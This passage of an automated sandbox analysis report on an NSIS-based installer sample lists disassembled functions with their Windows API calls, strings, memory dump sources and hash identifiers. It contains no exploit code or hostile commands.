                                              • MulDiv.KERNEL32(0000EE00,00000064,000DBE9C), ref: 00402DFD
                                              • wsprintfW.USER32 ref: 00402E0D
                                              • SetWindowTextW.USER32(?,?), ref: 00402E1D
                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E2F
                                              Strings
                                              • verifying installer: %d%%, xrefs: 00402E07
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Text$ItemTimerWindowwsprintf
                                              • String ID: verifying installer: %d%%
                                              • API String ID: 1451636040-82062127
                                              • Opcode ID: a052d906e27c43246bcc9f1aeeeeed0a4803bb8fb5ea3e7766d01d4d8a37771c
                                              • Instruction ID: aa47155a64d8ebbb4a0163e37034f34a23c06eccf97bc0b219fefb1598c68ac6
                                              • Opcode Fuzzy Hash: a052d906e27c43246bcc9f1aeeeeed0a4803bb8fb5ea3e7766d01d4d8a37771c
                                              • Instruction Fuzzy Hash: 25014470640108BBDF109F64DD49FAE3BA9AB04304F004139FA06A51E0DBB989558F58
                                              Function 00405AE7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                              Download Yara Rule
                                              APIs
                                              • CharNextW.USER32(?,*?|<>/":,00000000,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B4A
                                              • CharNextW.USER32(?,?,?,00000000), ref: 00405B59
                                              • CharNextW.USER32(?,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B5E
                                              • CharPrevW.USER32(?,?,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B72
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Char$Next$Prev
                                              • String ID: *?|<>/":
                                              • API String ID: 589700163-165019052
                                              • Opcode ID: b7b5818da4b4a2654bbca5167226ce5d18b2b6f4b0368041995d2741e331b462
                                              • Instruction ID: 31febb90154ecf465c6c3fd58460301c566faf6ecd06643fefb4dc305e878468
                                              • Opcode Fuzzy Hash: b7b5818da4b4a2654bbca5167226ce5d18b2b6f4b0368041995d2741e331b462
                                              • Instruction Fuzzy Hash: B9118E15810A1599CB30BB298840E7BB7F8EE95750750853FED85B32C1E778BC81CABD
                                              Function 00401497 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014B9
                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014F5
                                              • RegCloseKey.ADVAPI32(?), ref: 004014FE
                                              • RegCloseKey.ADVAPI32(?), ref: 00401523
                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401541
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Close$DeleteEnumOpen
                                              • String ID:
                                              • API String ID: 1912718029-0
                                              • Opcode ID: 9a7fa1e295040e987171b31cb3058b13b4927fc82cebbafdfd6fdbcfdef2d769
                                              • Instruction ID: 18dccf383a29a435c3c5d53fdb083507bb3959694e3d248e427a957da49423c4
                                              • Opcode Fuzzy Hash: 9a7fa1e295040e987171b31cb3058b13b4927fc82cebbafdfd6fdbcfdef2d769
                                              • Instruction Fuzzy Hash: B8113776500108FBDF119FA0DE85AAE3B7DEB45348F00443AF90AB51B0D7359E94AE69
                                              Function 004020AF Relevance: 7.6, APIs: 5, Instructions: 57memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileVersionInfoSizeW.VERSION(00000000,?), ref: 004020BF
                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?), ref: 004020E0
                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 004020F8
                                              • VerQueryValueW.VERSION(?,004082C8,?,?,?,00000000,00000000,00000000), ref: 00402111
                                                • Part of subcall function 004059FF: wsprintfW.USER32 ref: 00405A0C
                                              • GlobalFree.KERNEL32(0078BA50), ref: 00402139
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                              • String ID:
                                              • API String ID: 3376005127-0
                                              • Opcode ID: 1fcda80dc11e1363c08de8126c867463e0ce0b74cafb0b4a8e36d66cc7975c69
                                              • Instruction ID: ca10dc8ef845363045b229a4896d1fbdc02f34fd782a724fb491659cb49530f2
                                              • Opcode Fuzzy Hash: 1fcda80dc11e1363c08de8126c867463e0ce0b74cafb0b4a8e36d66cc7975c69
                                              • Instruction Fuzzy Hash: 11116A72900204ABDB11ABA5DE08A9E77B9AF04354F108136F605FA1E0EB78D940CB58
                                              Function 00401D76 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,00000000,00000002,?), ref: 00401DDF
                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401DF7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: MessageSend$Timeout
                                              • String ID: !
                                              • API String ID: 1777923405-2657877971
                                              • Opcode ID: 0a2216d3efa57a78be66af89e8cb1db1661eab1c73c2f6238fd6ec7ea61d154f
                                              • Instruction ID: 2bd8fc9b8c4150d32bad90dfffc0448b15bb1a7470975d4e46508bb72c72871e
                                              • Opcode Fuzzy Hash: 0a2216d3efa57a78be66af89e8cb1db1661eab1c73c2f6238fd6ec7ea61d154f
                                              • Instruction Fuzzy Hash: 77216071940218AADB15AFB4C946BFD7BB5EF05309F10857EFA02B50E1D77C8A809758
                                              Function 00403F13 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenW.KERNEL32(0044FD98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,0044FD98,?), ref: 00403FB0
                                              • wsprintfW.USER32 ref: 00403FBD
                                              • SetDlgItemTextW.USER32(?,0044FD98,000000DF), ref: 00403FD0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: ItemTextlstrlenwsprintf
                                              • String ID: %u.%u%s%s
                                              • API String ID: 3540041739-3551169577
                                              • Opcode ID: 7463db91dfc42c9920fcb0c5be4cc11050eaef945611b5cb4dc0a4985e01960d
                                              • Instruction ID: 5fad3c86b264af19ee74e6bf29dedfa0a61a2e47495169cbabc6e73bcd4b5a17
                                              • Opcode Fuzzy Hash: 7463db91dfc42c9920fcb0c5be4cc11050eaef945611b5cb4dc0a4985e01960d
                                              • Instruction Fuzzy Hash: 12117D32B002087BCB10DB699D41E9E766EEBD5338F10423BF519F31E0EA388A15875C
                                              Function 004024F8 Relevance: 6.1, APIs: 4, Instructions: 78registrystringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegCreateKeyExW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,00000000,?,00000000), ref: 00402546
                                              • lstrlenW.KERNEL32(004120F8), ref: 00402567
                                              • RegSetValueExW.ADVAPI32(?,?,00000000,?,004120F8,00000000), ref: 004025A6
                                              • RegCloseKey.ADVAPI32(?), ref: 004025B6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: CloseCreateValuelstrlen
                                              • String ID:
                                              • API String ID: 1356686001-0
                                              • Opcode ID: eb21bdfbd278206649cafd0a134e8c3462c0890b110457211e04b26388198419
                                              • Instruction ID: e0ce6b6c9d891c2747ed896ffb728d3f7ff2228f80022de3c727e62f6400905b
                                              • Opcode Fuzzy Hash: eb21bdfbd278206649cafd0a134e8c3462c0890b110457211e04b26388198419
                                              • Instruction Fuzzy Hash: 6F21B071A00204BBEB10AF65DE89FAF7779EB44714F10813BF504B61E1D7B89A809B6C
                                              Function 00401FFE Relevance: 6.1, APIs: 4, Instructions: 53synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00404A73: lstrlenW.KERNEL32(00447D88,00424D76,74DF23A0,00000000), ref: 00404AAB
                                                • Part of subcall function 00404A73: lstrlenW.KERNEL32(0040304D,00447D88,00424D76,74DF23A0,00000000), ref: 00404ABB
                                                • Part of subcall function 00404A73: lstrcatW.KERNEL32(00447D88,0040304D), ref: 00404ACE
                                                • Part of subcall function 00404A73: SetWindowTextW.USER32(00447D88,00447D88), ref: 00404AE0
                                                • Part of subcall function 00404A73: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404B06
                                                • Part of subcall function 00404A73: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00404B20
                                                • Part of subcall function 00404A73: SendMessageW.USER32(?,00001013,?,00000000), ref: 00404B2E
                                                • Part of subcall function 004056EC: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0045FDD0,Error launching installer), ref: 00405711
                                                • Part of subcall function 004056EC: CloseHandle.KERNEL32(?), ref: 0040571E
                                              • WaitForSingleObject.KERNEL32(00000000,00000064,?,?,?,?,?,00000000,000000EB,00000000), ref: 0040202F
                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F,?,?,?,?,?,00000000,000000EB,00000000), ref: 00402044
                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00402051
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,000000EB,00000000), ref: 004026BD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                              • String ID:
                                              • API String ID: 3585118688-0
                                              • Opcode ID: ad270f84a8785551dbcb8ed3b2656b967ed5d4589d67cc04499c355dac912d43
                                              • Instruction ID: 202ebcddbf8b426187c6ee2470dbf35ac1bf8be3455b7115f7585c4331235d23
                                              • Opcode Fuzzy Hash: ad270f84a8785551dbcb8ed3b2656b967ed5d4589d67cc04499c355dac912d43
                                              • Instruction Fuzzy Hash: 3E118231900214EADB219FA1CE08B9E7A75EB04358F104037E615B60E1C7BD8A82DB5D
                                              Function 004026EF Relevance: 6.0, APIs: 4, Instructions: 46memoryfilestringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GlobalAlloc.KERNEL32(00000040,00002004), ref: 004026F7
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0040E0F0,000000FF,?,00002004,00000000,00000000), ref: 00402730
                                              • lstrlenA.KERNEL32(?), ref: 00402739
                                              • WriteFile.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00402756
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                              • String ID:
                                              • API String ID: 2568930968-0
                                              • Opcode ID: 4e4b35b0ddbdd6058c26d859be66250fdf62ee6eb5fca338a8859292909502b4
                                              • Instruction ID: ced7ad9a6504f6ed498d5adba380047bc9decdec085bb0b424ae9f8a02fb9dcb
                                              • Opcode Fuzzy Hash: 4e4b35b0ddbdd6058c26d859be66250fdf62ee6eb5fca338a8859292909502b4
                                              • Instruction Fuzzy Hash: F9014F70500205BEEB156F60CE4DBBF3A6CEF04744F10453AF641FA1E1DBB849419B69
                                              Function 00401EF0 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDC.USER32(?), ref: 00401EF7
                                              • GetDeviceCaps.GDI32(00000000), ref: 00401EFE
                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401F0E
                                                • Part of subcall function 004060CA: GetVersion.KERNEL32(00447D88,?,00000000,00404AAA,00447D88,00000000,00424D76,74DF23A0,00000000), ref: 0040619B
                                              • CreateFontIndirectW.GDI32(0041E110), ref: 00401F61
                                                • Part of subcall function 004059FF: wsprintfW.USER32 ref: 00405A0C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                              • String ID:
                                              • API String ID: 1599320355-0
                                              • Opcode ID: a47370298229fbd9087b309e9c05a94d29a3d59c05c16ea411501fa641fe8ea9
                                              • Instruction ID: d6c42e3eeef43274fd936db1fda35bedcc132f3233f9f4bb317f1c521d1b95b8
                                              • Opcode Fuzzy Hash: a47370298229fbd9087b309e9c05a94d29a3d59c05c16ea411501fa641fe8ea9
                                              • Instruction Fuzzy Hash: BB018476644241AFE701ABB5AD4ABDE3BA4A715315F20883AE681B61E3CA784044CB2D
                                              Function 00402E3A Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                              Download Yara Rule
                                              APIs
                                              • DestroyWindow.USER32(00000000,00000000,00403297,00000001,?,?,?,00000000,004035D7,?), ref: 00402E4D
                                              • GetTickCount.KERNEL32 ref: 00402E6B
                                              • CreateDialogParamW.USER32(0000006F,00000000,00402DB4,00000000), ref: 00402E88
                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,004035D7,?), ref: 00402E96
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                              • String ID:
                                              • API String ID: 2102729457-0
                                              • Opcode ID: c46447e93630878450969176786434de847f14ddf39dd8d972ff8c80f950fc89
                                              • Instruction ID: c637284af2d6cdf60ec22d353f69018081d624b8e4296ea034bdf55e3067f771
                                              • Opcode Fuzzy Hash: c46447e93630878450969176786434de847f14ddf39dd8d972ff8c80f950fc89
                                              • Instruction Fuzzy Hash: 89F05E30541A21EBC6616B20FE0CAAB7B64FB04B51B4008BFF945B11E4CB7448938BDD
                                              Function 00405C29 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GlobalAlloc.KERNEL32(00000040,00002004,00000000,00000000,00000000,0040219A,00000000,?), ref: 00405C34
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000), ref: 00405C4A
                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00405C59
                                              • GlobalFree.KERNEL32(00000000), ref: 00405C62
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                              • String ID:
                                              • API String ID: 2883127279-0
                                              • Opcode ID: 7b8b1b869dc425c4e8d1decedcc15e3ea1801fb9e202fffad77dd5e1c54a2680
                                              • Instruction ID: e1c5d748dd31bcb7ed763deea17071bf78cda9c2e5a8ae371288e20c28570659
                                              • Opcode Fuzzy Hash: 7b8b1b869dc425c4e8d1decedcc15e3ea1801fb9e202fffad77dd5e1c54a2680
                                              • Instruction Fuzzy Hash: 00E092312001107BE2201B269E8CD6B7EACDFCA7B6B04013AF685E11A0CA308C11C678
                                              Function 004043CD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 00404403
                                              • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404471
                                                • Part of subcall function 00403937: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403949
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Window$CallMessageProcSendVisible
                                              • String ID:
                                              • API String ID: 3748168415-3916222277
                                              • Opcode ID: 9fdaa817c79f8fe2df8c01310cb7398ca4e4993dd3d52cefc4da2c44810d4525
                                              • Instruction ID: 950938491bfceb2c9a9aaf13ad46a3c9d7f26d5a45bb245acca2c437b02a68c6
                                              • Opcode Fuzzy Hash: 9fdaa817c79f8fe2df8c01310cb7398ca4e4993dd3d52cefc4da2c44810d4525
                                              • Instruction Fuzzy Hash: 52119EB1500228EBDF11AF91DD80E9B3729AF84325F00803BFB09751A2C77D89519FAA
                                              Function 00406042 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53stringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00405AB8: lstrcpynW.KERNEL32(?,?,00002004,00403483,004732A0,NSIS Error), ref: 00405AC5
                                                • Part of subcall function 00405807: CharNextW.USER32(?,004CC0A0,0045FE18,?,00406059,0045FE18,0045FE18,le@,004CC0A0,00000002,0040656C,?,004E00C8), ref: 00405815
                                                • Part of subcall function 00405807: CharNextW.USER32(00000000), ref: 0040581A
                                                • Part of subcall function 00405807: CharNextW.USER32(00000000), ref: 00405832
                                              • lstrlenW.KERNEL32(0045FE18,?,00000000,0045FE18,0045FE18,le@,004CC0A0,00000002,0040656C,?,004E00C8), ref: 004060A3
                                              • GetFileAttributesW.KERNEL32(0045FE18,0045FE18), ref: 004060B0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
